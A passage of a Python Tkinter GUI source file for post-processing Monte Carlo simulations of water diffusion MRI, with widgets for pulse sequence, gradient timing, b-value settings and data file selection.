self.nbVals.set(10);\n\n self.grdDirFromZ = tk.DoubleVar();\n self.grdDirFromZ.set(90.);\n\n # to display max bVal for mcsPostProcess, ...\n self.gamma = 6.28318* 42577481.6;\n self.dGradNB, self.dGradNBL = None, []; # related to diffusion table, ...\n\n self.TE_ms, self.maxG = tk.DoubleVar(), tk.DoubleVar();\n\n # to read a text G-Waveform table (timw_sec, amplitude, duration_sec)\n self.bGWaveTblRead = None;\n self.gWaveFileName, self.dGWaveTbl = None, None;\n\n self.dirFileName = None;\n self.dataFileName = []; # mcs data file names, ...\n\n self.fInfo = None # file info populated from the function mPstP.selectDataFiles()\n\n self.btnPsP = None;\n #self.btnPsP_0 = None;\n self.cBtnPsP, self.cBtnPsP_2, self.lblPsP, self.entPsP, self.cBtnPsP_3 = [], [], [], [], [];\n self.btnPsP_4 = [];\n\n self.cBtnPsPVal, self.cBtnPsP_2Val, self.cBtnPsP_3Val, self.Btn4Val = [], [], [], [];\n # ========================MPI post processing Ends=================\n\n self.w0Wd, self.w0Ht, self.w0X, self.w0Y = None, None, None, None;\n\n # colors for checkButton\n self.fgClrC, self.bgClrC = \"yellow\", \"blue\"; # \"black\";\n self.fgClrB, self.bgClrB = \"navy\", \"gray64\";\n self.hlBgColor = \"green\";\n\n self.colorMap4Dsp = eval(\"cm.gray\");\n\n if _platform in [\"linux\", \"linux2\"]:\n self.titleFont = tkFont.Font(family=\"Ariel\", weight='bold', size=10);\n # self.titleFont = tkFont.Font(family=\"Fixedsys\", weight='bold', size=10);\n self.procFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=12);\n self.lableFont = tkFont.Font(family=\"Ariel\", weight='bold', size=10);\n self.buttonFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n self.buttonFontSm= tkFont.Font(family=\"Helvetica\", weight='bold', size= 8);\n self.inputFont = tkFont.Font(family=\"Monaco\", weight='bold', size=10);\n self.boldFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n self.optFnt, self.optFntSz = \"Fixedsys\", 9;\n self.infoFont = tkFont.Font(family=\"Helvetica\", weight='bold', size= 9);\n winWd, winHt = 750, 400;\n elif _platform in [\"win32\", \"windows\"]:\n self.titleFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n self.procFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n self.lableFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=11);\n self.buttonFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n self.buttonFontSm= tkFont.Font(family=\"Helvetica\", weight='bold', size= 9);\n self.inputFont = tkFont.Font(family=\"Monaco\", weight='bold', size= 9);\n self.boldFont = tkFont.Font(family=\"Helvetica\", weight='bold', size= 9);\n self.infoFont = tkFont.Font(family=\"Helvetica\", weight='bold', size= 8);\n self.optFnt, self.optFntSz = \"Fixedsys\", 9;\n winWd, winHt = 750, 400;\n elif _platform == \"darwin\":\n self.titleFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=14);\n self.procFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n self.lableFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=12);\n self.buttonFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=11);\n self.buttonFontSm= tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n self.inputFont = tkFont.Font(family=\"Monaco\", weight='bold', size=12);\n self.boldFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=12);\n self.boldFont13 = tkFont.Font(family=\"Helvetica\", weight='bold', size=13);\n self.infoFont = tkFont.Font(family=\"Helvetica\", weight='bold', size= 9);\n self.optFnt, self.optFntSz = \"Monaco\", 11;\n winWd, winHt = 800, 400;\n\n self.initGUI (); # Initialize GUI frame\n\n def gui_makeInfoFrame (self):\n fgClrB, bgClrB = 'navy', 'black';\n hlBgColor = \"green\"\n if _platform in [\"win32\", \"windows\", \"linux\"]:\n titleFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n cmdFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=12);\n else:\n titleFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=14);\n cmdFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=16);\n\n self.hLine01 = ttk.Separator(self.frm0, orient=\"horizontal\"\n ).grid(row=0, column=1, columnspan=5, pady=1, sticky=\"ewns\")\n\n # png -> gif: http://image.online-convert.com/convert-to-gif\n self.myLogo = tk.PhotoImage(file=\"myLogoBGW.gif\"); # *.gif with ~ 72x100 pixels\n self.myLogo = self.myLogo.subsample(5,5); # only integer fraction\n #self.myLogo = self.myLogo.zoom(4, 4);\n\n self.myLogo_L = tk.Label(self.frm0, image=self.myLogo, bg='gray')\n self.myLogo_L.image = self.myLogo; # become transparent without this reference\n self.myLogo_L.grid (row=0, rowspan=4, column=0, sticky=\"ewns\");\n\n self.myLogo_L.bind (\"\",\n lambda event: getHelp(\"Yes for further HELP\",\n hlp.myGreeting_L, hlp.myGreeting_L2, \"no\"));\n\n # The selBox: Use a StringVar to access the selector's value\n # Look for \"unicode, Hangul Syllables\" on the web\n titleText = (\"myMCS:\\tv.08122021: -Click HERE for contact & more info\");\n titleText += (\"\\n\\t- postProcess MCS position data from MPI Server\");\n\n widB = 6 if sys.platform in [\"darwin\"] else 12;\n self.myGreeting_L = tk.Label(self.frm0, text=titleText, font=self.boldFont,\n fg='white', bg='black', padx=4, pady=0, width=78,\n anchor=\"w\", justify=tk.LEFT);\n self.myGreeting_L.grid (row=0, rowspan=1, column=1, columnspan=6, sticky=\"wens\");\n\n # color map for display\n self.colorMap4Dsp_L = tk.Label(self.frm0, text=\"colorMap\",\n borderwidth=1, relief=\"groove\",\n font=self.boldFont, fg=\"white\", bg=\"navy\");\n self.colorMap4Dsp_L.grid (row=1, column=1, sticky=\"wesn\");\n self.colorMap4Dsp = tk.StringVar();\n self.colorMap4Dsp_O = tk.OptionMenu(self.frm0, self.colorMap4Dsp,\n \"gray\", \"Blues\", \"Greens\", \"Reds\",\n \"OrRd\", \"YlGn_r\", \"hot\", \"cool\",\n \"jet\", \"rainbow\", \"ocean\",\n \"magma\", \"plasma\", \"BuGn\");\n self.colorMap4Dsp_O.grid (row=1, column=2, sticky=\"wesn\");\n self.colorMap4Dsp_O.config(font=(self.optFnt,self.optFntSz),bg='green',fg='black',width=6);\n self.colorMap4Dsp_O['menu'].config(font=(self.optFnt,self.optFntSz),bg='yellow',fg='black');\n self.colorMap4Dsp.set(\"magma\");\n mgv.colorMap4Dsp = eval(\"cm.\" + self.colorMap4Dsp.get());\n if bShowToolTip:\n tip = ToolTip(self.colorMap4Dsp_O, \"{colorMap4Dsp} Choose a colormap for display.\");\n\n self.colorMap4Dsp_L.bind (\"\", lambda event:\n getHelp(\"Yes for further HELP\", hlp.hlpColorMap_L, \"no\"));\n\n # Pulse sequence type (PST) for post-processing\n self.plsSeqType_L = tk.Label (self.frm0, text=\"plsSeqType\",\n borderwidth=1, relief=\"groove\",\n font=self.boldFont, fg=\"white\", bg=\"navy\");\n self.plsSeqType_L.grid (row=1, column=3, sticky=\"wesn\");\n self.plsSeqType = tk.StringVar();\n self.plsSeqType_O = tk.OptionMenu(self.frm0, self.plsSeqType, \"SpinEcho\", \"StimEcho\");\n self.plsSeqType_O.grid (row=1, column=4, sticky=\"wesn\");\n self.plsSeqType_O.config(font=(self.optFnt,self.optFntSz),bg='green',fg='black',width=6);\n self.plsSeqType_O['menu'].config(font=(self.optFnt,self.optFntSz),bg='yellow',fg='black');\n self.plsSeqType.set(\"StimEcho\");\n mgv.plsSeqType = self.plsSeqType.get();\n if bShowToolTip:\n tip = ToolTip(self.plsSeqType_O, \"{plsSeqType} Choose a pulse sequence type for post-processing.\");\n\n self.plsSeqType_L.bind (\"\", lambda event:\n getHelp(\"Yes for further HELP\", hlp.hlpPlsSeqType_L, \"no further help\", \"no\"));\n\n # T2 values of H2O in ics, mls, ecs in ms\n self.t2Vals_L = tk.Label (self.frm0, text=\"T\\u2082: (IA.ML.EA) (ms)\",\n borderwidth=1, relief=\"groove\",\n font=self.boldFont, fg=\"white\", bg=\"navy\");\n self.t2Vals_L.grid (row=1, column=5, sticky=\"wesn\");\n self.t2Vals = StringVar ( );\n self.t2Vals_E = tk.Entry (self.frm0, textvariable=self.t2Vals, width=8,\n state=\"disabled\", justify=tk.CENTER, bd=1);\n self.t2Vals_E.grid (row=1, column=6, sticky=\"ewns\", pady=1);\n self.t2Vals.set (\"100.10.100\");\n self.t2Vals_E.bind (\"\", lambda event: self.updateProtFtn(\"t2Vals_E\"));\n self.t2Vals_L.bind (\"\", lambda event:\n getHelp(\"Yes for further HELP\", hlp.hlpT2Vals_L, \"no further help\", \"no\"));\n\n # global functions\n self.UP_B = tk.Button(self.frm0, text='update protocol', font=self.titleFont,\n fg=\"darkgreen\", bg=bgClrB, padx=3, width=widB,\n command=lambda: self.updateProtFtn(\"UP_B\"));\n self.UP_B.grid (row=2, column=1, columnspan=2,sticky=\"wens\");\n\n self.CF_B = tk.Button(self.frm0, text='close\\n all figs.', font=self.titleFont,\n fg=fgClrB, bg=bgClrB, padx=3, width=widB,\n command=lambda: self.closeFigFtn());\n self.CF_B.grid (row=2, column=3, sticky=\"wens\");\n\n self.EP_B = tk.Button(self.frm0, text='enter pdb\\nh/hlp, c/cont., l/lst, j/jmp', padx=3,\n width=widB, fg=\"darkorange\", font=self.titleFont,\n command=self.enterPdbFtn);\n self.EP_B.grid (row=2, column=4, columnspan=2, sticky=\"ewns\");\n self.EP_B.bind (\"\",\n lambda event: getHelp(\"Yes for further HELP\", hlp.hlpEP, \"no further help\"));\n\n self.QT_B = tk.Button(self.frm0, text='Q U I T', padx=3,\n width=widB - 2*(_platform in [\"linux\"]),\n fg=\"red\", font=self.titleFont,\n command=self.quitFtn);\n self.QT_B.grid (row=2, column=6, columnspan=1, sticky=\"ewns\");\n\n self.hLine02 = ttk.Separator(self.frm0, orient=\"horizontal\").grid(row=3, column=1, columnspan=6, pady=1, sticky=\"ewns\");\n\n def quitFtn (self):\n global ugv, udv;\n\n myMod1 = \"quitFtn\";\n\n root.destroy();\n sys.exit(); # self.quit;\n\n def gui_mcsPstPro(self, row1=0, col1=1):\n myMod12 = \"guiPsP\";\n\n fgclr, fgclr_entry, bgclr = 'white', 'black', 'gray32'\n fgClrC, bgClrC = self.fgClrC, self.bgClrC;\n\n try:\n self.btnPsP.destroy();\n for btn in self.cBtnPsP: btn.destroy();\n except: pass;\n\n def InItDisplay (row1=1, col1=2):\n row1 += 1; # for hLine31\n self.cBtnPsP_2.append(self.guiChkButton(self.frm3, \"opnHdr\", self.openHdrTxt,\n fg1=fgClrC, bg1=bgClrC, row1=row1, col1=col1,\n wid1 = 7 + 2*(_platform in [\"linux\"]),\n state1=\"disabled\",\n indOn=0, def1=True, cmd1=None));\n self.cBtnPsP_2Val.append ( self.openHdrTxt );\n\n self.cBtnPsP_2Val.append ( self.bCalcT2 );\n self.bCalcT2.set (False);\n\n col1 += 1;\n self.btnPsP_2 = self.guiButton(self.frm3, 'display Geometry',\n fontB=self.buttonFont,\n row1=row1, col1=col1, colSpan=3,\n fg1=self.fgClrB, hlBgClr1=\"green\",\n cmd1=lambda: self.loadNDisplayFtn(\"EKJ\"));\n\n # read-only\n col1 += 3;\n self.TE_ms_L = tk.Label (self.frm3, text=\"TE (ms)\",\n borderwidth=1, relief=\"groove\",\n fg=fgclr, bg=bgclr,\n font=self.boldFont);\n self.TE_ms_L.grid (row=row1, column=col1, sticky=\"wesn\");\n\n self.TE_ms = tk.DoubleVar();\n self.TE_ms_E = tk.Entry (self.frm3, textvariable=self.TE_ms, width=7,\n font=self.inputFont,\n state=\"normal\", justify=tk.CENTER, bd=1);\n self.TE_ms_E.grid (row=row1, column=col1+1, sticky=\"ewns\", pady=1);\n self.TE_ms.set(20); # s/m2\n self.TE_ms_E.bind (\"\", lambda event: self.updateProtFtn(\"TE_ms_E\"));\n mgv.TE_ms = self.TE_ms.get();\n\n def postProCal (row1=2, col1=1):\n '''\n try:\n self.btnPsP_4.destroy();\n\n #for btn in self.cBtnPsP_3: btn.destroy();\n for lbl in self.lblPsP: lbl.destroy();\n for ent in self.entPsP: ent.destroy();\n except: pass;\n '''\n\n row1 += 1; # hLine31\n if sys.platform in [\"win32\", \"windows\", \"linux\"]:\n lbls = [u\"\\u2220 (G\\u20D7, e\\u2081)\", \"\\u03B4 (ms)\", \"\\u0394 (ms)\", \"nbVals\"];\n else: lbls = [u\"\\u2220 (G\\u20D7, \\u00EA\\u2081)\", \"\\u03B4 (ms)\", \"\\u0394 (ms)\", \"nbVals\"];\n\n guiVarPst = [self.grdDirFromZ, self.smallDel, self.bigDel, self.nbVals];\n\n for i in range (len(lbls) - 1):\n self.lblPsP.append(self.guiLabel(self.frm3, lbls[i], row1=row1 + i/3,\n col1=col1 + 1 + 2*(i%3), fontL=self.lableFont,\n fg1=fgclr, bg1=bgclr, wid1=6));\n entTmp, varTmp = self.guiEntry (self.frm3, guiVarPst[i], wid1=7, bd1=2,\n row1=row1 + i//3, col1=col1 + 2 + 2*(i%3),\n fg1=fgclr_entry);\n\n self.entPsP.append (entTmp);\n guiVarPst[i] = varTmp;\n\n # nbVals separately added\n self.lblPsP.append(self.guiLabel(self.frm3, lbls[3], row1=5,\n col1=2, fontL=self.lableFont,\n fg1=fgclr, bg1=bgclr, wid1=7));\n entTmp, varTmp = self.guiEntry (self.frm3, guiVarPst[3], wid1=7, bd1=2,\n row1=5, col1=3, fg1=fgclr_entry);\n\n self.entPsP.append (entTmp);\n guiVarPst[3] = varTmp;\n\n # new additional row\n self.maxG_L = tk.Label (self.frm3, text=\"max G (mT/m)\",\n borderwidth=1, relief=\"groove\",\n fg=fgclr, bg=bgclr, font=self.boldFont);\n self.maxG_L.grid (row=4, column=1, columnspan=2, sticky=\"wesn\");\n\n self.maxG = tk.DoubleVar();\n self.maxG_E = tk.Entry (self.frm3, textvariable=self.maxG, width=7,\n font=self.inputFont,\n state=\"normal\", justify=tk.CENTER, bd=1);\n self.maxG_E.grid (row=4, column=3, sticky=\"ewns\", pady=1);\n self.maxG.set(80); # s/m2\n self.maxG_E.bind (\"\", lambda event: self.updateProtFtn(\"maxG_E\"));\n mgv.maxG = self.maxG.get();\n\n\n # new row: 5\n self.bMx_DelG_DelDelta = tk.StringVar();\n self.bMx_DelG_DelDelta_O = tk.OptionMenu(self.frm3, self.bMx_DelG_DelDelta,\n self.bMaxTxt, self.delGTxt, self.delDeltaTxt);\n self.bMx_DelG_DelDelta_O.config (font=(self.optFnt,self.optFntSz),bg='green',fg='black',width=8);\n self.bMx_DelG_DelDelta_O['menu'].config (font=(self.optFnt,self.optFntSz),bg='yellow',fg='black');\n self.bMx_DelG_DelDelta_O.grid (row=5, column=4, sticky=\"wesn\")\n self.bMx_DelG_DelDelta_O.config (highlightbackground=bgclr);\n self.bMx_DelG_DelDelta.set(self.bMaxTxt);\n self.bMx_DelG_DelDelta_O.bind (\"\",\n lambda event: self.updateProtFtn(\"bMx_DelG_DelDelta_O\"));\n\n # increment Delta\n self.DeltaStep = tk.DoubleVar();\n self.DeltaStep_E = tk.Entry(self.frm3, textvariable=self.DeltaStep, width=7,\n font=self.inputFont,\n state=\"normal\", justify=tk.CENTER, bd=1);\n self.DeltaStep_E.grid (row=5, column=5, sticky=\"ewns\", pady=1);\n self.DeltaStep_E.bind (\"\", lambda event: self.updateProtFtn(\"DeltaStep_E\"));\n self.DeltaStep.set(100); # in ms unit, ...\n mgv.DeltaStep = 1e-3*self.DeltaStep.get();\n\n # icrement Gd, ...\n self.GdStep = tk.DoubleVar();\n self.GdStep_E = tk.Entry(self.frm3, textvariable=self.GdStep, width=7,\n font=self.inputFont,\n state=\"normal\", justify=tk.CENTER, bd=1);\n self.GdStep_E.grid (row=5, column=5, sticky=\"ewns\", pady=1);\n self.GdStep.set(10.0); # mT/m unit\n self.GdStep_E.bind (\"\", lambda event: self.updateProtFtn(\"GdStep_E\"));\n mgv.GdStep = self.GdStep.get();\n\n self.bMax = tk.IntVar();\n # self.bMax = tk.DoubleVar();\n self.bMax_E = tk.Entry (self.frm3, textvariable=self.bMax, width=7,\n font=self.inputFont,\n state=\"normal\", justify=tk.CENTER, bd=1);\n self.bMax_E.grid (row=5, column=5, columnspan=2, sticky=\"ewns\", pady=1);\n self.bMax.set(10000); # s/m2\n self.bMax_E.bind (\"\", lambda event: self.updateProtFtn(\"bMax_E\"));\n mgv.bMax = 1e6*self.bMax.get();\n\n # option to select constant delta, Gd, or B (with constant delta)\n self.varyDelGdB = tk.StringVar();\n self.varyDelGdB_O = tk.OptionMenu(self.frm3, self.varyDelGdB,\n self.varyDelTxt, self.varyGdTxt, self.constBTxt);\n self.varyDelGdB_O.config (font=(self.optFnt,self.optFntSz),bg='green',fg='black',width=5);\n self.varyDelGdB_O['menu'].config (font=(self.optFnt,self.optFntSz),bg='yellow',fg='black');\n self.varyDelGdB_O.grid (row=5, column=1, sticky=\"wesn\")\n self.varyDelGdB_O.config (highlightbackground=bgclr);\n self.varyDelGdB.set(self.varyGdTxt);\n\n mgv.varyDelTxt, mgv.varyGdTxt, mgv.constBTxt = self.varyDelTxt, self.varyGdTxt, self.constBTxt;\n\n # A column is push out in above for loop\n #self.cBtnPsP_3.append(self.guiChkButton(self.frm3, \" ... \", self.bMpiPySigComp,\n # row1=5, col1=6, fg1=fgClrC, bg1=bgClrC, indOn=0,\n # wid1=7, def1=True, cmd1=postProCal));\n col1 += 1;\n\n guiVarPst += [self.GdStep, self.varyDelGdB, False]; #, self.constantDiffTime];\n\n # self.cBtnPsP_3Val.append ( False );\n\n self.btnPsP_4 = self.guiButton(self.frm3, 'R U N',row1=5, col1=7, wid1=8,\n state1=\"disabled\",\n fontB=\"darkgreen\", # self.buttonFont,\n fg1=self.fgClrB, hlBgClr1=self.hlBgColor,\n cmd1=lambda: mPstP.mcsPostPro(guiVarPst, mgv,\n mPstP.readFiles(False, mgv, self.fInfo)).run(mgv));\n\n # separator, ...\n self.hLine31 = ttk.Separator(self.frm3, orient=\"horizontal\"\n ).grid(row=0, column=1, columnspan=7, pady=1, sticky=\"ewns\")\n\n dialogTxt = \"Select 3 files (initGeometry*.txt, *_mcs.txt, *_mcs.dat)\";\n lblTxt = 'select data: [gm*.dat, gm*_mcs.txt, gm*_mcs.dat]\\n';\n lblTxt += '... (1). geometry, (2). *_mcs.dat, (3). *_mcs.txt ...';\n self.btnPsP = tk.Button(self.frm3, text=lblTxt, fg=self.fgClrB, font=self.buttonFont,\n wid = 8 + 2*(_platform == \"linux\"),\n command=lambda: self.selectDataFiles(dialogTxt));\n self.btnPsP.grid (row=1, column=1, columnspan=7, sticky=\"ewns\");\n self.btnPsP.config (highlightbackground = self.hlBgColor);\n if bShowToolTip:\n ToolTip(self.btnPsP, \"{self.btnPsP} Load input geometry and MCS data/text files.\");\n\n # gradient-waveform table\n self.cBtnPsP.append(self.guiChkButton(self.frm3, \"dsp Geom\", self.initDsp,\n row1=2, col1=1, fg1=fgClrC, bg1=bgClrC, indOn=0,\n def1=True, state1=\"disabled\", cmd1=InItDisplay));\n\n self.cBtnPsP.append(self.guiChkButton (self.frm3, \"calc PostP\", self.postProCal,\n row1=3, col1=1, pady1=2,fg1=fgClrC, bg1=bgClrC,\n indOn=0, state1=\"disabled\",\n cmd1=postProCal));\n\n self.postProCal.set ( True );\n\n self.cBtnPsPVal.append ( self.initDsp );\n self.cBtnPsPVal.append ( self.postProCal );\n\n #\n InItDisplay();\n postProCal ();\n self.UP_B.invoke();\n\n self.hLine32 = ttk.Separator(self.frm3, orient=\"horizontal\"\n ).grid(row=6, column=1, columnspan=7, pady=1, sticky=\"ewns\")\n\n def selectDataFiles(self, dialogTxt):\n myMod1 = \"loadFiles\";\n\n txtC = mPstP.colored(\"[{:^10}:L{:0>4}]:Q: \".format(myMod1, getCurrLineNo()),\n \"green\", attrs=[\"bold\"]);\n\n print (txtC + dialogTxt);\n\n geomFileName, hdrFileName, datFileName = None, None, None;\n plt.close(\"all\");\n\n self.fInfo = mPstP.selectDataFiles(dialogTxt);\n\n err = False;\n if None not in self.fInfo:\n mgv.hdrFileName = hdrFileName = os.path.split(self.fInfo[0])[1];\n mgv.datFileName = datFileName = os.path.split(self.fInfo[1])[1];\n mgv.geomFileName = geomFileName = os.path.split(self.fInfo[2])[1];\n\n hdrName = geomFileName.split(\".\")[0];\n if not (hdrName in hdrFileName and hdrName in datFileName):\n err = True;\n txt = (\"Seleched files are are not consistant.\");\n txtC += mPstP.colored(txt, \"red\", attrs=[\"bold\"]);\n\n mgv.tmStr = self.tmStr = time.strftime('%m/%d/%Y', time.gmtime(os.path.getmtime(self.fInfo[0]))).split(\"/\");\n else:\n err = True;\n txt = (\"Selection of MCS file set not complete.\");\n txtC += mPstP.colored(txt, \"red\", attrs=[\"bold\", \"blink\"]);\n print (txtC);\n\n txt += \"\\nSelect correct files.\";\n res = mBox.showinfo(\"File-selection Error\", txt, icon=\"warning\");\n\n # check if , ...\n if None in [mgv.geomFileName, mgv.hdrFileName, mgv.datFileName] or err: return False;\n # else: self.btnPsP_4.config(state=\"normal\");\n\n txtC = mPstP.colored(\"[{:^10}:L{:0>4}]: : \".format(myMod1, getCurrLineNo()),\n \"green\", attrs=[\"bold\"]);\n txt = \"Selected data files = \\n\";\n txt += \" geomDat = %s\\n\" % (geomFileName);\n txt += \" mcsData = %s\\n\" % (datFileName );\n txt += \" mcsText = %s\\n\" % (hdrFileName );\n print (txtC + txt);\n\n # load and display data, ...\n self.loadNDisplayFtn(\"loadFiles\");\n\n success = self.updateProtFtn(\"%s\" % myMod1);\n\n if None in self.fInfo:\n err = True;\n txt = (\"No file has been selected.\");\n txtC += mPstP.colored(txt, \"red\", attrs=[\"bold\"]);\n print (txtC);\n\n if err:\n txt += \"\\nSelect correct files.\";\n res = mBox.showinfo(\"fileSelection Error\", txt, icon=\"warning\");\n\n def guiRadioButton (self, frm, txt, var, row1=0, col1=0, fg1=None, bg1=None, cmd1=None):\n rbtn = tk.Radiobutton(frm, text=txt, variable = var, value = 1,\n fg=fg1, bg=bg1, relief=tk.RIDGE);\n rbtn.grid (row=row1, column=col1);\n return rbtn;\n\n def guiButton (self, frm, txt, row1=0, col1=0, rowSpan=1, colSpan=1, wid1=8,\n state1=\"normal\",\n fg1=None, bg1=None, fontB=None, padx1=None, pady1=None,\n hlBgClr1=None, cmd1=None):\n if fontB == None: fontB = \"-weight bold\";\n\n cbtn = tk.Button(frm, text=txt, fg=fg1, bg=bg1, relief=tk.RIDGE,\n padx=padx1, pady=pady1, state=state1,\n command=cmd1, font=fontB, width=wid1);\n cbtn.grid (row=int(row1), column=int(col1), rowspan=rowSpan, columnspan=colSpan, sticky=\"ewns\");\n cbtn.config (highlightbackground = hlBgClr1);\n\n return cbtn;\n\n def guiChkButton(self, frm, txt, var, indOn=0, row1=0, col1=0, rowSpan=1,\n wid1=8, colSpan=1, fg1=None, bg1=None, fontC=None,\n padx1=1, pady1=2, def1=True, cmd1=None, state1=\"normal\"):\n if fontC == None: fontC = \"-weight bold\";\n\n chkBtn = tk.Checkbutton(frm, text=txt, variable=var, indicatoron=indOn,\n padx=padx1, pady=pady1, state=state1,\n fg=fg1, bg=bg1, command=cmd1, relief=tk.RIDGE,\n font=fontC, width=wid1);\n var.set(def1);\n\n chkBtn.grid(row=int(row1), column=int(col1), rowspan=rowSpan, columnspan=colSpan, sticky=\"ewns\");\n\n return chkBtn;\n\n def guiLabel(self, frm, txt, row1=0, col1=0, fg1= None, bg1=None, fontL=None, wid1=8, padx1=2, pady1=0):\n if fontL == None: fontL = \"-weight bold\";\n\n lbl = tk.Label(frm, text=txt, fg=fg1, bg=bg1, padx=4, relief=tk.RIDGE,\n font=fontL, width=wid1);\n lbl.grid (row=int(row1), column=int(col1), sticky=\"ewns\");\n return lbl;\n\n def guiEntry (self, frm, txtVar, row1=0, col1=0, fg1=None, bg1=None, font1=None, wid1=5, padx1=1, bd1=2):\n if font1 == None: font1 = self.inputFont;\n\n ent = tk.Entry(frm, textvariable=txtVar, fg=fg1, bg=bg1, bd=bd1, relief=tk.RIDGE,\n font = self.inputFont, justify=tk.CENTER, width=wid1);\n ent.grid(row = int(row1), column=int(col1), sticky=\"ewns\");\n ent.bind (\"\", lambda event: self.updateProtFtn(txtVar));\n\n return ent, txtVar;\n\n def initGUI(self):\n self.master = root;\n\n eachFrm = 'gray48';\n\n self.frmHgt0, self.frmHgt3, self.frmHgt4 = 108, 152, 64;\n\n self.w0Wd = 648;\n self.w0Ht = self.frmHgt0 + self.frmHgt3 + self.frmHgt4 + 13;\n\n self.w0X, self.w0Y = self.master.winfo_screenwidth() - self.w0Wd, 0;\n self.master .geometry(\"%dx%d+%d+%d\" % (self.w0Wd, self.w0Ht, self.w0X, self.w0Y))\n\n titleTxt = ('Monte-Carlo Simulation of Water Diffusion:');\n if _platform not in [\"win32\", \"windows\"]:\n hostName = platform.node();\n loginName = os.getlogin();\n titleTxt += (' {OS: %s, %s@' % (platform.system(), loginName));\n if _platform in [\"darwin\"]:\n titleTxt += ('%s}' % hostName[:hostName.index(\".\")]);\n elif _platform in [\"linux\"]: titleTxt += ('%s}' % hostName);\n\n self.master.title( titleTxt);\n\n # root.title(\"Monte-Carlo Simulation of water diffusion\") # Set the window title\n self.master.minsize(width=self.w0Wd, height=self.w0Ht);\n self.master.maxsize(width=self.w0Wd, height=self.w0Ht);\n self.master.resizable(width=False, height=False);\n\n # tk.Frame 0 is for creating a geometry\n self.frm0 = tk.Frame(self.master, width=self.w0Wd-6, height=self.frmHgt0,\n bg=eachFrm, relief=tk.RIDGE);\n self.frm0.grid(row=0, column=0, padx=3, pady=2);\n self.frm0.grid_propagate(False);\n\n #tk.Frame 3 is for doing a postprocessing\n self.frm3 = tk.Frame(self.master, width=self.w0Wd-6, height=self.frmHgt3,\n bg=eachFrm, relief=tk.RIDGE);\n self.frm3.grid(row=1, column=0, padx=3, pady=2);\n self.frm3.grid_propagate(False);\n\n #tk.Frame 4 is for doing a postprocessing\n self.frm4 = tk.Frame(self.master, width=self.w0Wd-6, height=self.frmHgt4,\n bg=eachFrm, relief=tk.RIDGE);\n self.frm4.grid(row=2, column=0, padx=3, pady=2);\n self.frm4.grid_propagate(False);\n\n self.master.configure(bg=\"darkred\"); # set the window background color\n\n def closeFigFtn (self):\n plt.close(\"all\");\n\n def enterPdbFtn (self):\n txtC = mPstP.colored(\"Entered debugging mode. h/help, c/continue, q/quit.\", \"red\", attrs=[\"bold\"]);\n print (txtC);\n pdb.set_trace();\n\n def loadNDisplayFtn (self, txtIn):\n myMod1 = \"loadNDisplayFtn\";\n\n mPstP.loadNDisplay(mgv, [self.bMkDiffMovie, self.openHdrTxt],\n mPstP.readFiles(False, mgv, self.fInfo));\n\n if self.mcsPstPro.get():\n mgv.bMcsDataLoaded = self.bMcsDataLoaded = True;\n else: mgv.bMcsDataLoaded = self.bMcsDataLoaded = False;\n\n # set these values and display on MCS window, ..\n cPrint(\"[{:^10}:L{:0>4}]: : mcs data successfully loaded:\".format(myMod1, getCurrLineNo()),\n \"green\", attrs=[\"bold\"]);\n\n def nullFtn (self, txtIn):\n myMod1 = \"Null Button\";\n\n txtC = mPstP.colored(\"[{:^10}:L{:0>4}]: : \".format(myMod1, getCurrLineNo()), \"green\", attrs=[\"bold\"]);\n print (txtC + \" %s NOT USED. \" % txtIn);\n\n def updateProtFtn (self, txtIn):\n myMod1 = \"updateProt\"\n\n txtC = mPstP.colored(\"[{:^10}:L{:0>4}]: : \".format(myMod1, getCurrLineNo()),\n \"green\", attrs=[\"bold\"]);\n print (txtC + \"update-protocol invoked by {%s}.\" % txtIn);\n\n if self.bMcsDataLoaded:\n if 2*self.smallDel.get() > mgv.dtDiff:\n self.smallDel.set(mgv.dtDiff/2);\n\n diffTime = (self.smallDel.get() + self.bigDel.get());\n if mgv.dtDiff < diffTime:\n txt = (\"%.1f < (%.1f + %.1f)\" % (mgv.dtDiff, self.smallDel.get(), self.bigDel.get()));\n txt += (\"\\n\\t--> Reduce gradient duration and separation.\");\n print (txtC + txt);\n\n self.bigDel.set(mgv.dtDiff - self.smallDel.get());\n\n self.mcsPstPro.set ( True );\n self.initDsp.set ( True );\n self.postProCal.set( True );\n\n # update checkButton fg and bg colors, ...\n self.cBtnPsPVal [0] = self.initDsp;\n self.cBtnPsPVal [1] = self.postProCal;\n # self.cBtnPsPVal [2] = False;\n\n if self.nbVals.get() < 2: self.nbVals.set(2);\n\n if None in [mgv.geomFileName, mgv.hdrFileName, mgv.datFileName]:\n self.btnPsP_4.config(state=\"disabled\");\n else: self.btnPsP_4.config(state=\"normal\");\n\n if self.postProCal.get():\n self.cBtnPsP_2Val[0] = self.bMkDiffMovie;\n self.cBtnPsP_2Val[1] = self.openHdrTxt;\n\n if self.bMax.get() <= 0.0: self.bMax.set (1);\n\n if self.bMx_DelG_DelDelta.get() == self.bMaxTxt:\n self.GdStep_E.grid_remove ();\n self.DeltaStep_E.grid_remove();\n self.bMax_E.grid ();\n elif self.bMx_DelG_DelDelta.get() == self.delGTxt:\n self.bMax_E.grid_remove ();\n self.DeltaStep_E.grid_remove();\n self.GdStep_E.grid ();\n elif self.bMx_DelG_DelDelta.get() == self.delDeltaTxt:\n self.GdStep_E.grid_remove();\n self.bMax_E.grid_remove ();\n self.DeltaStep_E.grid ();\n\n GPS.config(text=gpsLblTxt + \"\\nD W I\");\n\n # otherwise, error is raised in mPstP.sigCalc\n if self.bMax.get() == 0: self.bMax.set(10);\n\n mgv.bMax = 1e6*self.bMax.get();\n mgv.GdStep = self.GdStep.get();\n mgv.DeltaStep = 1e-3*self.DeltaStep.get();\n 